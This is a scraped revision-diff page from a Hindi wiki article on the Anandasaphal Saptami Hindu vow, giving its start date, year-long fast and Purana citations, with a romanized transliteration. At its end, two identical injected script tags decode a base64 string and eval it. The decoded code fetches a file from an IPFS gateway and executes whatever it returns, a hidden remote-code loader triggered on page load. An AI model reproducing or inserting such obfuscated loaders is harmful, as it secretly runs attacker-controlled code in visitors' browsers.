Difference between revisions of "आनन्दसफल सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (आनन्दसफलसप्तमी का नाम बदलकर आनन्दसफल सप्तमी कर दिया गया है)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[भाद्रपद]] [[शुक्ल पक्ष]] [[सप्तमी]]को आरम्भ करना चाहिए।
 
*यह व्रत [[भाद्रपद]] [[शुक्ल पक्ष]] [[सप्तमी]]को आरम्भ करना चाहिए।
*इस व्रत में एक वर्ष के तक उपवास करना चाहिए। <ref>भविष्यपुराण (1|110|1-8), कृत्यकल्पतरु (व्रत 148-149), हेमाद्रि व्रतखण्ड (1, 741)।</ref>
+
*इस व्रत में एक वर्ष के तक उपवास करना चाहिए।<ref>[[भविष्य पुराण]] (1|110|1-8), कृत्यकल्पतरु (व्रत 148-149), हेमाद्रि व्रतखण्ड (1, 741)।</ref>
 
 
 
 
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 05:40, 11 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat bhadrapad shukl paksh saptamiko arambh karana chahie.
  • is vrat mean ek varsh ke tak upavas karana chahie.[1]

 

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bhavishy puran (1|110|1-8), krityakalpataru (vrat 148-149), hemadri vratakhand (1, 741).

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>